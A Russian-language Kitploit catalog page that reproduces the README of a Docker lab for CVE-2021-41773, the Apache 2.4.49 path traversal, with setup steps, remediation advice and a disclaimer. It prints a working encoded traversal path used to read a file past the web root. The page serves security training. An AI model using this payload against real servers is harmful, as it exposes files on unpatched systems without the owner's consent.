Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773-Apache-Lab — Лаборатория на базе Docker для воспроизведения CVE-2021-41773 (Apache HTTP Server 2.4.49) через контролируемый обход пути и раскрытие файлов с использованием специально написанного Python PoC. | Kitploit
Инструменты/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

Лаборатория на базе Docker для воспроизведения CVE-2021-41773 (Apache HTTP Server 2.4.49) через контролируемый обход пути и раскрытие файлов с использованием специально написанного Python PoC.

Репозиторий
127 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 — Лаборатория Apache HTTP Server 2.4.49

Воспроизведение CVE-2021-41773 — уязвимости обхода пути в Apache HTTP Server 2.4.49.

Этот проект использует Docker для создания изолированной уязвимой среды и Python PoC для демонстрации контролируемого раскрытия файлов.

Безопасность: PoC принимает только цели localhost, 127.0.0.1 или ::1. Тестирование должно оставаться в пределах изолированной лаборатории.

Цель

Этот проект демонстрирует:

  • Настройку Apache HTTP Server 2.4.49 в Docker
  • Проверку уязвимой версии Apache
  • Воспроизведение CVE-2021-41773
  • Демонстрацию контролируемого раскрытия файлов
  • Разработку собственного Python PoC
  • Сбор доказательств эксплуатации
  • Документирование шагов по устранению уязвимости

Демонстрация сосредоточена на раскрытии файлов, а не на удалённом выполнении кода.

Структура проекта

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

Требования

  • Docker
  • Python 3.x
  • Git

PoC использует только стандартную библиотеку Python и не требует сторонних Python-пакетов.

Настройка лаборатории

1. Сборка Docker-образа

Из корня репозитория:

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. Запуск уязвимого сервера Apache

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

Не закрывайте этот терминал.

Сервис Apache доступен только через:

root@kitploit:~
127.0.0.1:8080

Проверка

Проверка контейнера

В другом терминале:

root@kitploit:~
docker ps

Контейнер должен отображать:

root@kitploit:~
127.0.0.1:8080->80/tcp

Проверка версии Apache

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

Ожидаемый результат:

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

Проверка обычного HTTP-доступа

root@kitploit:~
curl http://127.0.0.1:8080/

Должна возвращаться тестовая страница Apache.

Эксплуатация

PoC находится по пути:

root@kitploit:~
exploit/exploit.py

Запуск:

root@kitploit:~
python3 exploit/exploit.py

Цель по умолчанию:

root@kitploit:~
http://127.0.0.1:8080

Файл-доказательство по умолчанию:

root@kitploit:~
/lab/secret.txt

При успешном запуске выводится:

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

Затем PoC отображает содержимое контролируемого файла лаборатории.

Как работает PoC

Сначала PoC проверяет, что цель является локальным адресом:

root@kitploit:~
localhost
127.0.0.1
::1

Затем он формирует путь, содержащий закодированные компоненты обхода:

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

Запрос отправляется с помощью стандартного модуля socket Python. Это даёт PoC прямой контроль над путём HTTP-запроса.

Уязвимый сервер Apache 2.4.49 обрабатывает созданный путь и возвращает содержимое:

root@kitploit:~
/lab/secret.txt

Получение этого файла подтверждает обход пути и контролируемое раскрытие файлов.

Сводка по уязвимости

CVE: CVE-2021-41773

Продукт: Apache HTTP Server

Продемонстрированная уязвимая версия: 2.4.49

Тип уязвимости: Обход пути / Раскрытие файлов

CVE-2021-41773 — это уязвимость обхода пути в Apache HTTP Server 2.4.49. Специально созданный URL может обойти предполагаемые ограничения пути и позволить доступ к файлам за пределами ожидаемого каталога.

При определённых конфигурациях уязвимость может иметь более серьёзные последствия. Этот проект намеренно демонстрирует контролируемое раскрытие файлов в изолированной среде Docker.

Доказательства

Скриншоты, собранные во время тестирования, хранятся в:

root@kitploit:~
evidence/

Доказательства включают:

  1. Запущенный Docker-контейнер
  2. Проверка версии Apache HTTP Server 2.4.49
  3. Успешное выполнение Python PoC

Меры по устранению уязвимости

Основная мера — обновить Apache HTTP Server до исправленной версии.

Дополнительные защитные меры включают:

  • Регулярно устанавливайте обновления для Apache.
  • Ограничивайте доступ к конфиденциальным файлам.
  • Пересматривайте конфигурации Alias и CGI.
  • Применяйте разрешения с минимальными привилегиями.
  • Избегайте предоставления доступа к ненужным службам.
  • Отслеживайте журналы сервера на предмет подозрительных запросов с обходом пути.

Ссылки

  • Рекомендации по безопасности Apache HTTP Server: https://httpd.apache.org/security/vulnerabilities_24.html

  • Национальная база данных уязвимостей NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • Рекомендации по безопасности CERT-EU: https://cert.europa.eu/publications/security-advisories/2021-054/

Отказ от ответственности

Этот проект предназначен исключительно для авторизованного обучения в области безопасности и контролируемого лабораторного тестирования.

Среда Docker и PoC предназначены для локального тестирования. Не используйте PoC против систем, которыми вы не владеете или на оценку которых у вас нет явного разрешения.

Скачать инструмент